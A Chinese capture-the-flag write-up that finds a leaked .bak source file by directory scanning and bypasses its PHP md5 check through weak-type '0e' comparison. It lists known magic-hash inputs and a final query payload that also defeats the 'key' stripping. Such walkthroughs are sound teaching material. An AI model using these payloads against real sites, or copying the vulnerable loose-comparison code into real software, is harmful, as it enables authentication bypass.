备份是个好习惯

##解题思路

首先看到题目说备份是个好习惯，说明可能存在备份文件泄露

用dirsearch或者其他的目录扫描工具扫一扫，发现两个网址状态码正常，其中一个刚好是.bak的备份文件

至于flag文件，无法读取源码，都是空的

下载备份文件后，得到一串后端的逻辑

逻辑如下：

1. 用 include_once 语句包含 "flag.php" 文件。该文件应包含变量 $flag，用于存储标志（flag）

1. ini_set函数表示将 PHP 的错误显示设置为 0，即不显示错误信息

1. 代码从 $_SERVER['REQUEST_URI'] 中获取 URL 的参数部分，去掉第一个字符 ?

1. 用 str_replace 函数将参数中的 ’key’ 替换为空字符串。接着使用 parse_str 函数将参数解析为变量。

1. 用 md5 函数对 $key1 和 $key2 进行哈希运算，并通过echo语句输出结果。

1. 用条件语句判断 $key1 和 $key2 的哈希值是否相等，且 $key1、$key2不相等。

2. 如满足条件，则通过 echo 语句输出 $flag 变量的值和一段文字

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/
​
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
​
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

那么知道规则了就应该知道怎么绕过了，这就需要用到php的弱类型比较，这里是网上常见的输入值和md5值

纯数字类：
s878926199a
0e545993274517709034328855841020
​
s155964671a
0e342768416822451524974117254469
​
s214587387a
0e848240448830537924465865611904
​
s214587387a
0e848240448830537924465865611904
​
s878926199a
0e545993274517709034328855841020
​
s1091221200a
0e940624217856561557816327384675
​
s1885207154a
0e509367213418206700842008763514
​
s1502113478a
0e861580163291561247404381396064
​
s1885207154a
0e509367213418206700842008763514
​
s1836677006a
0e481036490867661113260034900752
​
s155964671a
0e342768416822451524974117254469
​
s1184209335a
0e072485820392773389523109082030
​
s1665632922a
0e731198061491163073197128363787
​
s1502113478a
0e861580163291561247404381396064
​
s1836677006a
0e481036490867661113260034900752
​
s1091221200a
0e940624217856561557816327384675
​
s155964671a
0e342768416822451524974117254469
​
s1502113478a
0e861580163291561247404381396064
​
s155964671a
0e342768416822451524974117254469
​
s1665632922a
0e731198061491163073197128363787
​
s155964671a
0e342768416822451524974117254469
​
s1091221200a
0e940624217856561557816327384675
​
s1836677006a
0e481036490867661113260034900752
​
s1885207154a
0e509367213418206700842008763514
​
s532378020a
0e220463095855511507588041205815
​
s878926199a
0e545993274517709034328855841020
​
s1091221200a
0e940624217856561557816327384675
​
s214587387a
0e848240448830537924465865611904
​
s1502113478a
0e861580163291561247404381396064
​
s1091221200a
0e940624217856561557816327384675
​
s1665632922a
0e731198061491163073197128363787
​
s1885207154a
0e509367213418206700842008763514
​
s1836677006a
0e481036490867661113260034900752
​
s1665632922a
0e731198061491163073197128363787
​
s878926199a
0e545993274517709034328855841020
 
 
大写字母类：
QLTHNDT
0e405967825401955372549139051580
 
QNKCDZO
0e830400451993494058024219903391
 
EEIZDOI
0e782601363539291779881938479162
 
TUFEPMC
0e839407194569345277863905212547
 
UTIPEZQ
0e382098788231234954670291303879
 
UYXFLOI
0e552539585246568817348686838809
 
IHKFRNS
0e256160682445802696926137988570
 
PJNPDWY
0e291529052894702774557631701704
 
ABJIHVY
0e755264355178451322893275696586
 
DQWRASX
0e742373665639232907775599582643
 
DYAXWCA
0e424759758842488633464374063001
 
GEGHBXL
0e248776895502908863709684713578
 
GGHMVOE
0e362766013028313274586933780773
 
GZECLQZ
0e537612333747236407713628225676
 
NWWKITQ
0e763082070976038347657360817689
 
NOOPCJF
0e818888003657176127862245791911
 
MAUXXQC
0e478478466848439040434801845361
 
MMHUWUV
0e701732711630150438129209816536

接下来就是自由组合环节，随便哪个payload都可以kkeyey1=s878926199a&kkeyey2=s155964671a